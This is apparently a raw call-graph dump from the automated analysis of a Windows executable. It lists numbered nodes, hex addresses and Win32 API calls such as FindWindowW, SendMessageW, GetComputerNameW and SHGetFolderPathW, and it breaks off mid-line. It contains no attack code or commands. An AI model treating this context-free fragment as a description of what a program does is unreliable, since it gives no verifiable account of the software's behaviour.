76607->76608 76609 4485fe 76607->76609 76620 45f9af 76619->76620 76621 45fa2e GetClassInfoW 76620->76621 76627 408d5c 44 API calls 76620->76627 76641 45f9df 76620->76641 76622 45fa5b 76621->76622 76623 45faa5 76622->76623 76624 45fa6c UnregisterClassW 76622->76624 76625 45fa7c RegisterClassW 76622->76625 76655 45fb68 76623->76655 76658 443558 76623->76658 76669 4788f8 76623->76669 76624->76625 76625->76623 76626 45faa0 76625->76626 76699 4135bc 54 API calls 76626->76699 76629 45fa17 76627->76629 76697 41196c 52 API calls 76629->76697 76631 45fac9 GetWindowLongW 76634 45fade GetWindowLongW 76631->76634 76635 45faff 76631->76635 76632 45fabb 76632->76631 76700 4135bc 54 API calls 76632->76700 76633 45fa29 76698 404a74 12 API calls 76633->76698 76634->76635 76638 45faf0 SetWindowLongW 76634->76638 76684 40e15c 76635->76684 76638->76635 76641->76621 76643 45fb19 76644 430d88 21 API calls 76643->76644 76645 45fb23 76644->76645 76646 45c458 170 API calls 76645->76646 76647 45fb31 76646->76647 76647->76606 76656 40a124 CreateWindowExW 76655->76656 76657 45fb9d 76656->76657 76657->76632 76659 44357d 76658->76659 76660 4435e3 76658->76660 76659->76660 76662 44358d 76659->76662 76661 40a124 CreateWindowExW 76660->76661 76665 443617 76661->76665 76663 40a124 CreateWindowExW 76662->76663 76664 4435c6 76663->76664 76664->76665 76666 4435d2 SendMessageW 76664->76666 76701 414ff4 76665->76701 76666->76665 76668 44363d 76668->76632 76670 4789d0 76669->76670 76671 478906 76669->76671 76670->76632 76671->76670 76672 47892b GetWindowLongW 76671->76672 76673 47893c 76672->76673 76675 478945 76672->76675 76673->76675 76677 4789a4 76673->76677 76674 478963 76676 4306c0 GetSysColor 76674->76676 76675->76674 76678 47895d SetWindowLongW 76675->76678 76680 478993 76676->76680 76679 4789b4 SetWindowLongW 76677->76679 76678->76674 76681 463a10 76679->76681 76682 47899b SetLayeredWindowAttributes 76680->76682 76683 4789ca RedrawWindow 76681->76683 76682->76670 76683->76670 76685 40e160 76684->76685 76686 40e16a 76684->76686 76687 403034 12 API calls 76685->76687 76688 463dc8 IsIconic 76686->76688 76687->76686 76689 463e07 GetWindowRect 76688->76689 76690 463de0 GetWindowPlacement 76688->76690 76691 463e18 GetWindowLongW 76689->76691 76690->76691 76692 463e31 GetWindowLongW 76691->76692 76694 463eb1 76691->76694 76693 463e45 GetWindowLongW 76692->76693 76692->76694 76695 463e54 76693->76695 76696 463e67 ScreenToClient ScreenToClient 76693->76696 76694->76643 76695->76696 76696->76694 76697->76633 76699->76623 76700->76631 76702 415008 76701->76702 76703 41501e SendMessageW 76702->76703 76704 415036 76703->76704 76704->76668 76705 4df1c0 76708 4df1d1 76705->76708 76709 4df184 76708->76709 76710 406448 12 API calls 76709->76710 76711 4df19b 76710->76711 76716 4df0b0 76711->76716 76713 4df1a3 76714 4df0b0 62 API calls 76713->76714 76715 4df1b9 76713->76715 76714->76715 76717 4df0e1 76716->76717 76723 4df119 76716->76723 76724 4deef4 76717->76724 76719 406448 12 API calls 76721 4df161 76719->76721 76720 4df100 76722 406448 12 API calls 76720->76722 76721->76713 76722->76723 76723->76719 76725 4def24 76724->76725 76726 4def60 76725->76726 76727 4def41 SHGetFolderPathW 76725->76727 76728 4defb9 76726->76728 76729 4def83 76726->76729 76727->76726 76730 406448 12 API calls 76728->76730 76737 47e6bc 76729->76737 76731 4defc2 76730->76731 76733 4b2e4c 60 API calls 76731->76733 76736 4defb7 76733->76736 76736->76720 76738 47e6c5 76737->76738 76738->76738 76739 47e6ec GetFullPathNameW 76738->76739 76740 47e70f 76739->76740 76741 47e6f8 76739->76741 76743 406448 12 API calls 76740->76743 76741->76740 76742 47e700 76741->76742 76744 406584 12 API calls 76742->76744 76745 47e70d 76743->76745 76744->76745 76746 47ea84 76745->76746 76747 47ea95 76746->76747 76748 47eadb 76747->76748 76749 47ead0 76747->76749 76750 406bec 13 API calls 76748->76750 76751 406448 12 API calls 76749->76751 76752 47ead9 76750->76752 76751->76752 76752->76736 76753 4f42f8 76754 4f4301 76753->76754 77098 405a34 76754->77098 76757 4f4365 76759 405a34 12 API calls 76757->76759 76758 4f433c 76760 49ff74 69 API calls 76758->76760 76761 4f4372 76759->76761 76762 4f434b 76760->76762 76763 4f4374 76761->76763 76764 4f43f2 76761->76764 77156 4aff58 18 API calls 76762->77156 77170 49fe6c 81 API calls 76763->77170 76768 405a34 12 API calls 76764->76768 76767 4f4353 77157 4a00b0 76767->77157 76771 4f43ff 76768->76771 76769 4f4380 76774 4f43c5 76769->76774 76775 4f4384 76769->76775 76772 4f443e 76771->76772 76773 4f4401 76771->76773 76777 405a34 12 API calls 76772->76777 76778 49ff74 69 API calls 76773->76778 76776 49ff74 69 API calls 76774->76776 76779 4f4398 76775->76779 76780 4f438e 76775->76780 76781 4f43d6 76776->76781 76782 4f444b 76777->76782 76784 4f4419 76778->76784 76783 49ff74 69 API calls 76779->76783 77171 4adae0 12 API calls 76780->77171 77173 4af218 64 API calls 76781->77173 76788 4f44b6 76782->76788 76789 4f444d 76782->76789 76790 4f43a9 76783->76790 76791 49feb8 79 API calls 76784->76791 76787 4f4360 76792 40527c 12 API calls 76787->76792 76796 405a34 12 API calls 76788->76796 77175 49fe6c 81 API calls 76789->77175 77172 4af218 64 API calls 76790->77172 76793 4f4429 76791->76793 76815 4f4f1b 76792->76815 77174 4b0150 9 API calls 76793->77174 76794 4f43e0 76798 4a00b0 62 API calls 76794->76798 76800 4f44c3 76796->76800 77088 4f43c0 76798->77088 76804 4f44c5 76800->76804 76805 4f4511 76800->76805 76801 4f445b 77176 49fe6c 81 API calls 76801->77176 76802 4f43b3 76803 4a00b0 62 API calls 76802->76803 76803->77088 76808 49ff74 69 API calls 76804->76808 76807 405a34 12 API calls 76805->76807 76810 4f451e 76807->76810 76812 4f44da 76808->76812 76809 4f446a 76811 49ff74 69 API calls 76809->76811 76813 4f453b 76810->76813 76814 4f4520 76810->76814 76817 4f4482 76811->76817 76816 49ff74 69 API calls 76812->76816 76820 405a34 12 API calls 76813->76820 77196 4b0024 GetComputerNameW 76814->77196 76819 40527c 12 API calls 76815->76819 76821 4f44ed 76816->76821 77177 49fe6c 81 API calls 76817->77177 76828 4f4f40 76819->76828 76825 4f4548 76820->76825 77179 4adfdc 76821->77179 76823 4f4528 77200 4a0540 62 API calls 76823->77200 76829 4f454a 76825->76829 76830 4f458a 76825->76830 76826 4f4494 77178 4aea0c 27 API calls 76826->77178 76835 49ff74 69 API calls 76829->76835 76834 405a34 12 API calls 76830->76834 76833 4f44a4 76837 4a00b0 62 API calls 76833->76837 76838 4f4597 76834->76838 76839 4f4559 76835->76839 76837->77088 76840 4f45d1 76838->76840 76841 4f4599 76838->76841 77201 4af678 59 API calls 76839->77201 77088->76787 77100 405978 77098->77100 77099 405a04 77099->76757 77099->76758 77100->77099 77101 4052a0 12 API calls 77100->77101 77101->77099 77156->76767 77158 4a00d0 77157->77158 77159 4a00f9 77158->77159 77160 4a00e7 77158->77160 77431 48a2e4 62 API calls 77159->77431 77430 48a2e4 62 API calls 77160->77430 77163 4a00f7 77164 4a0130 77163->77164 77165 408d5c 44 API calls 77163->77165 77164->76787 77166 4a011c 77165->77166 77432 411930 12 API calls 77166->77432 77168 4a012b 77433 404a74 12 API calls 77168->77433 77170->76769 77171->76779 77172->76802 77173->76794 77174->77088 77175->76801 77176->76809 77177->76826 77178->76833 77180 4ae000 77179->77180 77181 47e290 12 API calls 77180->77181 77182 4ae019 77181->77182 77183 40649c 12 API calls 77182->77183 77197 4b0052 77196->77197 77199 4b0040 77196->77199 77198 406448 12 API calls 77197->77198 77198->77199 77199->76823 77200->76787 77430->77163 77431->77163 77432->77168 77463 443158 77464 443183 77463->77464 77466 443227 77463->77466 77465 443193 SendMessageW 77464->77465 77467 4431b1 77465->77467 77468 44319f 77465->77468 77470 4431c2 SendMessageW 77467->77470 77469 406914 12 API calls 77468->77469 77472 4431af 77469->77472 77470->77466 77471 4431ce 77470->77471 77474 4431de SendMessageW 77471->77474 77473 443209 SendMessageW 77472->77473 77475 44321b 77473->77475 77474->77466 77476 4431e8 77474->77476 77478 414ff4 SendMessageW 77475->77478 77477 406914 12 API calls 77476->77477 77477->77472 77478->77466 77479 465c74 77480 465c7e 77479->77480 77481 45e0c8 66 API calls 77480->77481 77482 465c94 77481->77482 77487 431848 57 API calls 77482->77487 77484 465ca0 77488 459890 82 API calls 77484->77488 77486 465cb1 77487->77484 77488->77486 77489 4a1cbc 77490 4a1cf1 77489->77490 77491 4a1cea 77489->77491 77492 4a1cfa 77490->77492 77493 4a1d10 77490->77493 77494 40527c 12 API calls 77491->77494 77533 4a1a3c 18 API calls 77492->77533 77524 40532c 77493->77524 77497 4a1ead 77494->77497 77498 4a1d1e 77528 405b30 77498->77528 77499 4a1d05 77499->77493 77500 4a1d09 77499->77500 77500->77491 77502 4a1d3a 77503 405b30 12 API calls 77502->77503 77504 4a1d56 77503->77504 77504->77491 77505 4a1d6e 77504->77505 77506 405b30 12 API calls 77505->77506 77507 4a1d89 77506->77507 77508 482d60 12 API calls 77507->77508 77509 4a1daf 77508->77509 77510 4a1dd3 77509->77510 77511 482e40 12 API calls 77509->77511 77512 4a1e15 77510->77512 77514 49c4fc 12 API calls 77510->77514 77511->77509 77513 4a1e2d 77512->77513 77516 49c4fc 12 API calls 77512->77516 77515 49a7b4 15 API calls 77513->77515 77514->77510 77517 4a1e62 77515->77517 77516->77513 77526 405330 77524->77526 77525 405366 77525->77498 77526->77525 77527 403034 12 API calls 77526->77527 77527->77525 77537 405abc 77528->77537 77530 405b3e 77531 405b78 77530->77531 77543 405d30 12 API calls 77530->77543 77531->77502 77533->77499 77538 405a64 77537->77538 77541 405ab3 77538->77541 77544 405368 12 API calls 77538->77544 77540 405a8f 77540->77541 77542 403034 12 API calls 77540->77542 77541->77530 77542->77541 77543->77531 77544->77540 77545 4c44e8 77572 45a758 77545->77572 77547 4c4523 77548 45a758 4 API calls 77547->77548 77549 4c454f 77548->77549 77550 4c4565 SHGetFileInfoW 77549->77550 77551 4c4594 77550->77551 77552 4c45c8 77550->77552 77551->77552 77553 4c459e ExtractIconW 77551->77553 77555 4c45d5 77552->77555 77556 4c4626 77552->77556 77575 4c4424 77553->77575 77557 47e290 12 API calls 77555->77557 77558 4df184 62 API calls 77556->77558 77559 4c45e9 77557->77559 77560 4c4635 77558->77560 77561 406854 12 API calls 77559->77561 77562 4c464a 77560->77562 77564 4df184 62 API calls 77560->77564 77563 4c45f9 77561->77563 77565 4c466b SHGetFileInfoW 77562->77565 77568 4c4621 77562->77568 77566 4c4604 ExtractIconW 77563->77566 77564->77562 77567 4c4675 77565->77567 77565->77568 77569 4c4424 82 API calls 77566->77569 77567->77568 77570 4c467f ExtractIconW 77567->77570 77569->77568 77571 4c4424 82 API calls 77570->77571 77571->77568 77590 46335c 77572->77590 77573 45a771 77573->77547 77576 4c44e2 77575->77576 77577 4c4438 77575->77577 77576->77552 77600 435634 57 API calls 77577->77600 77579 4c446e 77580 4316b8 16 API calls 77579->77580 77581 4c447b 77580->77581 77601 435634 57 API calls 77581->77601 77583 4c449a 77602 431e8c 67 API calls 77583->77602 77585 4c44a0 77603 435634 57 API calls 77585->77603 77587 4c44b9 77604 432554 66 API calls 77587->77604 77589 4c44be DrawIconEx DestroyCursor 77589->77552 77591 463370 77590->77591 77592 463394 IsIconic 77591->77592 77593 463418 77591->77593 77595 4633c0 77591->77595 77594 4633a4 SetWindowPos 77592->77594 77592->77595 77593->77573 77594->77593 77595->77593 77596 4633dd GetWindowPlacement 77595->77596 77599 45a97c 77596->77599 77598 4633fe SetWindowPlacement 77598->77593 77599->77598 77600->77579 77601->77583 77602->77585 77603->77587 77604->77589 77605 45772c IsWindowUnicode 77606 457798 SetWindowLongW GetWindowLongW 77605->77606 77607 45774f SetWindowLongW GetWindowLongW 77605->77607 77608 4577df SetPropW SetPropW 77606->77608 77609 4577c1 GetWindowLongW 77606->77609 77607->77608 77610 457778 GetWindowLongW 77607->77610 77615 42bce0 77608->77615 77609->77608 77611 4577d0 SetWindowLongW 77609->77611 77610->77608 77612 457787 SetWindowLongW 77610->77612 77611->77608 77612->77608 77620 460448 77615->77620 77627 47aec4 77615->77627 77635 47b4ac 77615->77635 77616 42bcf6 77626 460848 170 API calls 77620->77626 77621 460477 77734 4596dc 90 API calls 77621->77734 77623 460489 77735 433f28 92 API calls 77623->77735 77625 46048e 77625->77616 77626->77621 77628 47aed9 77627->77628 77630 47af60 77627->77630 77629 47aee2 EnumWindows 77628->77629 77628->77630 77629->77630 77631 47af02 GetWindow GetWindowLongW 77629->77631 77630->77616 77632 47af1f 77631->77632 77632->77630 77633 423514 52 API calls 77632->77633 77634 47af54 SetWindowPos 77633->77634 77634->77630 77634->77632 77636 47b514 77635->77636 77640 47b4e2 77635->77640 77736 47b320 77636->77736 77638 423514 52 API calls 77638->77640 77640->77636 77640->77638 77657 47b503 77640->77657 77641 47b5d6 77645 47b62c 77641->77645 77646 47b5dd 77641->77646 77642 47b52f 77643 47baa9 77642->77643 77644 47b535 77642->77644 77791 47cb00 13 API calls 77643->77791 77653 47b599 77644->77653 77654 47b5bf 77644->77654 77644->77657 77675 47b5ba 77644->77675 77647 47b652 77645->77647 77648 47b633 77645->77648 77650 47b5e3 77646->77650 77678 47b90d 77646->77678 77647->77657 77668 47b8ca 77647->77668 77647->77675 77655 47b639 77648->77655 77656 47bac3 77648->77656 77651 47b613 77650->77651 77652 47b5ea 77650->77652 77661 47b61e 77651->77661 77662 47ba25 GetLastActivePopup 77651->77662 77658 47b5f0 77652->77658 77696 47b9a6 77652->77696 77659 47b59f 77653->77659 77660 47b756 77653->77660 77665 47b5c8 77654->77665 77677 47bb53 77654->77677 77663 47ba65 77655->77663 77664 47b644 77655->77664 77666 47bacc 77656->77666 77667 47bae4 77656->77667 77657->77616 77671 47b5f7 77658->77671 77672 47b66e 77658->77672 77680 47b70a 77659->77680 77681 47b5a8 77659->77681 77747 47b41c DefWindowProcW 77660->77747 77674 47b8eb 77661->77674 77661->77675 77662->77657 77679 470a2c IsIconic 77663->77679 77664->77643 77664->77675 77665->77675 77683 47b71f 77665->77683 77670 47c3e4 13 API calls 77666->77670 77792 47c444 53 API calls 77667->77792 77788 47dda4 170 API calls 77668->77788 77670->77657 77684 47b86f SendMessageW 77671->77684 77685 47b603 77671->77685 77694 47b680 77672->77694 77695 47b689 77672->77695 77789 47c148 IsWindowEnabled 77674->77789 77756 47b41c DefWindowProcW 77675->77756 77794 47b41c DefWindowProcW 77677->77794 77678->77657 77708 47b933 IsWindowEnabled 77678->77708 77691 47ba73 77679->77691 77786 47b41c DefWindowProcW 77680->77786 77692 47b5b1 77681->77692 77693 47b89b 77681->77693 77688 47bbec 51 API calls 77683->77688 77684->77657 77685->77675 77697 47bb66 77685->77697 77686 47b8b6 77686->77657 77687 47b75c 77698 47b77d 77687->77698 77699 47b7be 77687->77699 77688->77657 77691->77657 77701 47ba7b GetFocus 77691->77701 77692->77675 77702 47bb2d 77692->77702 77693->77657 77706 47b8b1 77693->77706 77704 47b687 77694->77704 77705 47b696 77694->77705 77757 47bc08 78 API calls 77695->77757 77696->77657 77717 47b9e6 IsWindowEnabled 77696->77717 77697->77657 77795 4796d4 52 API calls 77697->77795 77796 45f6fc 52 API calls 77697->77796 77748 47b024 77698->77748 77753 47afc4 77699->77753 77701->77657 77709 47ba8f 77701->77709 77711 4690d4 24 API calls 77702->77711 77785 47b41c DefWindowProcW 77704->77785 77758 47bd0c 77705->77758 77787 405084 12 API calls 77706->77787 77708->77657 77721 47b941 77708->77721 77790 470d5c GetCurrentThreadId EnumThreadWindows 77709->77790 77718 47bb3f 77711->77718 77717->77657 77726 47b9f0 77717->77726 77793 47b41c DefWindowProcW 77718->77793 77720 47ba96 77720->77657 77723 47ba9e SetFocus 77720->77723 77722 47b948 IsWindowVisible 77721->77722 77722->77657 77724 47b956 GetFocus 77722->77724 77723->77657 77727 463a10 77724->77727 77726->77657 77728 47ba06 SetFocus 77726->77728 77729 47b96b SetFocus 77727->77729 77728->77657 77730 45c458 170 API calls 77729->77730 77731 47b98a SetFocus 77730->77731 77731->77657 77734->77623 77735->77625 77737 47b333 77736->77737 77738 47b398 77737->77738 77739 47b33e SetThreadLocale 77737->77739 77740 47b34d 77737->77740 77738->77641 77738->77642 77797 412f90 58 API calls 77739->77797 77742 479d8c 185 API calls 77740->77742 77743 47b35d 77740->77743 77742->77743 77743->77738 77744 470aac 8 API calls 77743->77744 77745 47b389 77744->77745 77746 470aac 8 API calls 77745->77746 77746->77738 77747->77687 77749 47b031 77748->77749 77750 47b080 PostMessageW 77748->77750 77749->77750 77751 423514 52 API calls 77749->77751 77750->77657 77752 47b074 SetWindowPos 77751->77752 77752->77749 77752->77750 77754 47aec4 56 API calls 77753->77754 77755 47afcb PostMessageW 77754->77755 77755->77657 77756->77657 77757->77657 77759 470a2c IsIconic 77758->77759 77760 47bd1b 77759->77760 77761 47bd23 SetActiveWindow 77760->77761 77762 47be46 77760->77762 77763 47bd3e 77761->77763 77764 47bde0 77761->77764 77762->77657 77766 47bd47 77763->77766 77769 47bd5b 77763->77769 77765 47be05 77764->77765 77768 47bdf0 77764->77768 77767 47b024 53 API calls 77765->77767 77771 47bd50 ShowWindow 77766->77771 77770 47be0c 77767->77770 77768->77765 77799 474f08 ShowWindow 77768->77799 77772 47bd96 77769->77772 77775 47bd72 IsWindowEnabled 77769->77775 77801 47b184 61 API calls 77770->77801 77771->77764 77798 47a6cc SystemParametersInfoW SystemParametersInfoW ShowWindow 77772->77798 77775->77772 77779 47bd7c DefWindowProcW 77775->77779 77777 47be15 77778 47bdfd 77800 477fb4 170 API calls 77778->77800 77783 47bda6 SetWindowPos 77779->77783 77783->77764 77785->77657 77786->77657 77788->77657 77789->77657 77790->77720 77791->77686 77792->77686 77793->77657 77794->77657 77795->77697 77796->77697 77797->77740 77798->77783 77799->77778 77800->77765 77801->77777 77802 47b090 21 API calls 77801->77802 77803 442b14 77804 45f97c 192 API calls 77803->77804 77805 442b3b 77804->77805 77813 4e2d99 77814 4e2da4 77813->77814 77815 4e2db0 77814->77815 77816 4e2dce 77814->77816 77817 4e2dc5 77815->77817 78121 4e17ac 77 API calls 77815->78121 78123 4e1594 60 API calls 77816->78123 78122 4e1594 60 API calls 77817->78122 77821 4e2dcc 77822 4e2e09 77821->77822 78124 4d73e0 237 API calls 77821->78124 77826 4e2e4e 77822->77826 78126 4e1744 12 API calls 77822->78126 77825 4e2e73 77830 4e2e87 77825->77830 77831 4e2e8d 77825->77831 77826->77825 77827 4e2e67 77826->77827 77828 4e2e65 77826->77828 78128 4e1818 77 API calls 77827->78128 77838 4e1788 77 API calls 77828->77838 77829 4e2e00 77829->77822 78125 4118fc 44 API calls 77829->78125 77835 4e2e8b 77830->77835 77841 4e1788 77 API calls 77830->77841 77831->77835 77839 4e1788 77 API calls 77831->77839 77832 4e2e41 78127 4e17ac 77 API calls 77832->78127 77936 4de288 77835->77936 77838->77825 77839->77835 77841->77835 77937 4de290 77936->77937 77937->77937 77938 47f714 GetWindowsDirectoryW 77937->77938 77939 4de2ae 77938->77939 77940 406448 12 API calls 77939->77940 77941 4de2bb 77940->77941 77942 47f740 GetSystemDirectoryW 77941->77942 77943 4de2c3 77942->77943 77944 406448 12 API calls 77943->77944 77945 4de2d0 77944->77945 78161 47f76c 77945->78161 77947 4de2d8 78121->77817 78122->77821 78123->77821 78124->77829 78126->77832 78127->77826 78128->77825 78162 406448 12 API calls 78161->78162 78163 47f77e GetModuleHandleW 78162->78163 78164 409620 14 API calls 78163->78164 78165 47f793 78164->78165 78165->77947 77806 470bac 77807 470bf1 77806->77807 77808 470bbb IsWindowVisible 77806->77808 77808->77807 77809 470bc5 IsWindowEnabled 77808->77809 77809->77807 77810 470bcf 77809->77810 77811 403018 12 API calls 77810->77811 77812 470bd9 EnableWindow 77811->77812 77812->77807 79737 4f7424 79738 405a34 12 API calls 79737->79738 79739 4f7462 79738->79739 79740 4f7478 79739->79740 79741 4f7464 79739->79741 79742 405a34 12 API calls 79740->79742 79743 49feb8 79 API calls 79741->79743 79745 4f7485 79742->79745 79744 4f746d Sleep 79743->79744 79750 4f759b 79744->79750 79746 4f7487 79745->79746 79747 4f74b4 79745->79747 79748 49ff74 69 API calls 79746->79748 79749 405a34 12 API calls 79747->79749 79753 4f7496 79748->79753 79751 4f74c1 79749->79751 79752 40527c 12 API calls 79750->79752 79754 4f74c3 79751->79754 79755 4f74f0 79751->79755 79757 4f7934 79752->79757 79758 4f749e FindWindowW 79753->79758 79759 49ff74 69 API calls 79754->79759 79756 405a34 12 API calls 79755->79756 79760 4f74fd 79756->79760 79906 4a0304 62 API calls 79758->79906 79762 4f74d0 79759->79762 79763 4f74ff 79760->79763 79764 4f7546 79760->79764 79765 4f74d8 FindWindowW 79762->79765 79767 49feb8 79 API calls 79763->79767 79766 405a34 12 API calls 79764->79766 79907 4a0304 62 API calls 79765->79907 79769 4f7553 79766->79769 79770 4f750b 79767->79770 79771 4f75a0 79769->79771 79772 4f7555 79769->79772 79773 49feb8 79 API calls 79770->79773 79774 405a34 12 API calls 79771->79774 79775 49feb8 79 API calls 79772->79775 79776 4f7518 79773->79776 79777 4f75ad 79774->79777 79778 4f7561 79775->79778 79779 49feb8 79 API calls 79776->79779 79780 4f75af 79777->79780 79781 4f75fa 79777->79781 79782 49feb8 79 API calls 79778->79782 79783 4f7525 79779->79783 79785 49feb8 79 API calls 79780->79785 79784 405a34 12 API calls 79781->79784 79786 4f756e 79782->79786 79787 49feb8 79 API calls 79783->79787 79790 4f7607 79784->79790 79789 4f75bb 79785->79789 79791 49feb8 79 API calls 79786->79791 79788 4f7530 SendMessageW 79787->79788 79908 4a0304 62 API calls 79788->79908 79793 49feb8 79 API calls 79789->79793 79794 4f7609 79790->79794 79795 4f7634 79790->79795 79796 4f757b 79791->79796 79798 4f75c8 79793->79798 79797 49ff74 69 API calls 79794->79797 79799 405a34 12 API calls 79795->79799 79800 49feb8 79 API calls 79796->79800 79804 4f7616 79797->79804 79801 49feb8 79 API calls 79798->79801 79803 4f7641 79799->79803 79802 4f7586 PostMessageW 79800->79802 79807 4f75d5 79801->79807 79808 4a00b0 62 API calls 79802->79808 79805 4f7682 79803->79805 79806 4f7643 79803->79806 79809 4f761e RegisterWindowMessageW 79804->79809 79810 405a34 12 API calls 79805->79810 79812 49feb8 79 API calls 79806->79812 79811 49feb8 79 API calls 79807->79811 79808->79750 79909 4a0304 62 API calls 79809->79909 79813 4f768f 79810->79813 79816 4f75e0 SendNotifyMessageW 79811->79816 79815 4f764f 79812->79815 79847 4f74af 79847->79750 79906->79847 79907->79847 79908->79847 79909->79750 79920 45ef8c 79921 45efa8 79920->79921 79939 45ebf4 79921->79939 79923 45f147 79924 45efd6 79924->79923 79943 45ea68 79924->79943 79927 45ea68 60 API calls 79928 45f081 79927->79928 79929 45ea68 60 API calls 79928->79929 79930 45f08a 79929->79930 79931 45ea68 60 API calls 79930->79931 79932 45f093 79931->79932 79933 45ea68 60 API calls 79932->79933 79934 45f09c 79933->79934 79935 45ea68 60 API calls 79934->79935 79936 45f0a5 79935->79936 79937 45ea68 60 API calls 79936->79937 79938 45f0ae 79937->79938 79940 45ec09 79939->79940 79941 45ec3b 79940->79941 79942 45f6a0 52 API calls 79940->79942 79941->79924 79942->79940 79944 45ea7e 79943->79944 79949 45eb96 79944->79949 79950 423514 52 API calls 79944->79950 79956 45f6a0 52 API calls 79944->79956 79957 423594 52 API calls 79944->79957 79945 45ebe6 79945->79927 79947 423514 52 API calls 79947->79949 79949->79945 79949->79947 79952 45ea20 79949->79952 79950->79944 79953 45ea4f 79952->79953 79958 45e480 79953->79958 79956->79944 79957->79944 79959 45e4a3 79958->79959 79960 45e666 79959->79960 79963 45e54a MulDiv 79959->79963 79964 45e514 79959->79964 79962 45e76f 79960->79962 79972 469970 79960->79972 79962->79949 79963->79964 79965 45e575 79964->79965 79966 45e5ad MulDiv 79964->79966 79967 45e646 79965->79967 79968 45e5ee MulDiv 79965->79968 79970 45e60b 79965->79970 79966->79965 79969 469970 4 API calls 79967->79969 79968->79970 79969->79960 79970->79967 79971 45e628 MulDiv 79970->79971 79971->79967 79973 469a52 79972->79973 79974 46998c 79972->79974 79973->79962 79975 4699c8 79974->79975 79976 46335c 4 API calls 79974->79976 79975->79962 79976->79975 79977 4f6770 79978 4f6779 79977->79978 79978->79978 79979 405a34 12 API calls 79978->79979 79980 4f67af 79979->79980 79981 4f67b1 79980->79981 79982 4f67bb 79980->79982 80221 412628 MessageBeep 79981->80221 79984 405a34 12 API calls 79982->79984 79985 4f67c8 79984->79985 79986 4f67f3 79985->79986 79987 4f67ca 79985->79987 79989 405a34 12 API calls 79986->79989 79988 49ff74 69 API calls 79987->79988 79990 4f67d7 79988->79990 79991 4f6800 79989->79991 79993 40c6b4 13 API calls 79990->79993 79994 4f6802 79991->79994 79995 4f682b 79991->79995 79992 4f67b6 79997 4f67e2 79993->79997 79998 49ff74 69 API calls 79994->79998 79996 405a34 12 API calls 79995->79996 79999 4f6838 79996->79999 80222 4a0540 62 API calls 79997->80222 80001 4f680f 79998->80001 80002 4f6863 79999->80002 80003 4f683a 79999->80003 80223 40c774 13 API calls 80001->80223 80007 405a34 12 API calls 80002->80007 80005 49ff74 69 API calls 80003->80005 80008 4f6847 80005->80008 80006 4f681a 80224 4a0540 62 API calls 80006->80224 80010 4f6870 80007->80010 80225 40c814 13 API calls 80008->80225 80012 4f6872 80010->80012 80013 4f688b 80010->80013 80227 40dcf8 GetCurrentDirectoryW SetCurrentDirectoryW GetCurrentDirectoryW SetCurrentDirectoryW 80012->80227 80014 405a34 12 API calls 80013->80014 80017 4f6898 80014->80017 80015 4f6852 80226 4a0540 62 API calls 80015->80226 80020 4f68bf 80017->80020 80021 4f689a 80017->80021 80018 4f687a 80228 4a0540 62 API calls 80018->80228 80024 405a34 12 API calls 80020->80024 80023 49ff74 69 API calls 80021->80023 80026 4f68a7 80023->80026 80025 4f68cc 80024->80025 80027 4f68ce 80025->80027 80028 4f68f7 80025->80028 80229 40dd04 80026->80229 80030 49ff74 69 API calls 80027->80030 80031 405a34 12 API calls 80028->80031 80033 4f68db 80030->80033 80034 4f6904 80031->80034 80032 4f68af 80036 47e6bc 13 API calls 80033->80036 80037 4f6906 80034->80037 80038 4f692f 80034->80038 80221->79992 80222->79992 80223->80006 80224->79992 80225->80015 80226->79992 80227->80018 80228->79992 80230 4064d4 80229->80230 80231 40dd0e SetCurrentDirectoryW 80230->80231 80231->80032 80256 4c9584 80257 4c958c 80256->80257 80257->80257 80258 4c9a3d 80257->80258 80259 4c9641 80257->80259 80260 4c9652 80257->80260 80261 4c9630 80257->80261 80262 4c961f 80257->80262 80263 4c960e 80257->80263 80271 4c95f3 80257->80271 80578 4c92f0 202 API calls 80259->80578 80579 4c9518 194 API calls 80260->80579 80577 4c910c 205 API calls 80261->80577 80576 4c8f98 194 API calls 80262->80576 80575 4c8e08 203 API calls 80263->80575 80270 4c9614 80270->80258 80270->80271 80271->80258 80318 4c62a8 80271->80318 80275 423514 52 API calls 80280 4c96d5 80275->80280 80276 45b0c8 170 API calls 80276->80280 80277 4c97f9 80581 4e644c 274 API calls 80277->80581 80280->80258 80280->80275 80280->80276 80280->80277 80282 47ea84 13 API calls 80280->80282 80283 406448 12 API calls 80280->80283 80284 4c88c0 178 API calls 80280->80284 80285 4c9854 80280->80285 80314 4c991e 80280->80314 80323 4c61c0 80280->80323 80331 4c8610 80280->80331 80500 4e5ef8 80280->80500 80606 4c8b94 56 API calls 80280->80606 80281 4c9816 80281->80258 80282->80280 80283->80280 80284->80280 80338 4c7608 80285->80338 80289 4c988a 80343 4c7698 80289->80343 80290 4c88c0 178 API calls 80290->80258 80314->80290 80319 4c61c0 52 API calls 80318->80319 80320 4c62b7 80319->80320 80321 423514 52 API calls 80320->80321 80322 4c62c4 80321->80322 80322->80258 80322->80280 80580 4fa138 56 API calls 80322->80580 80324 4c620b 80323->80324 80329 4c61ef 80323->80329 80325 40e258 52 API calls 80324->80325 80327 4c6228 80325->80327 80326 423514 52 API calls 80326->80329 80607 4adae0 12 API calls 80327->80607 80329->80324 80329->80326 80330 4c6230 80329->80330 80330->80280 80332 4c8621 80331->80332 80334 4c861c 80331->80334 80680 4c727c 173 API calls 80332->80680 80337 4c861f 80334->80337 80608 4c7fec 80334->80608 80336 4c8629 80336->80280 80337->80280 80339 4c7620 80338->80339 80340 4c768f 80339->80340 80686 4a7d00 52 API calls 80339->80686 80687 4a7ca0 52 API calls 80339->80687 80340->80289 80344 4c76b0 80343->80344 80345 4c7721 80344->80345 80688 4a7d00 52 API calls 80344->80688 80689 4a7ca0 52 API calls 80344->80689 80348 4c7728 80345->80348 80349 406448 12 API calls 80348->80349 80350 4c775a 80349->80350 80351 45b010 170 API calls 80350->80351 80352 4c7774 80351->80352 80353 45b010 170 API calls 80352->80353 80354 4c7784 80353->80354 80355 45b010 170 API calls 80354->80355 80356 4c7794 80355->80356 80357 45b010 170 API calls 80356->80357 80501 4e5f00 80500->80501 80853 4c9f6c 80501->80853 80504 4e5f44 80506 45b0c8 170 API calls 80504->80506 80575->80270 80576->80271 80577->80271 80578->80271 80579->80271 80580->80280 80581->80281 80606->80280 80607->80330 80609 4c7ff4 80608->80609 80609->80609 80610 45b010 170 API calls 80609->80610 80614 4c8020 80610->80614 80611 4c83ad 80612 4c8512 80611->80612 80613 4c8549 80611->80613 80617 40649c 12 API calls 80612->80617 80619 40649c 12 API calls 80613->80619 80614->80611 80616 4c80eb 80614->80616 80618 40649c 12 API calls 80614->80618 80615 4c8116 80624 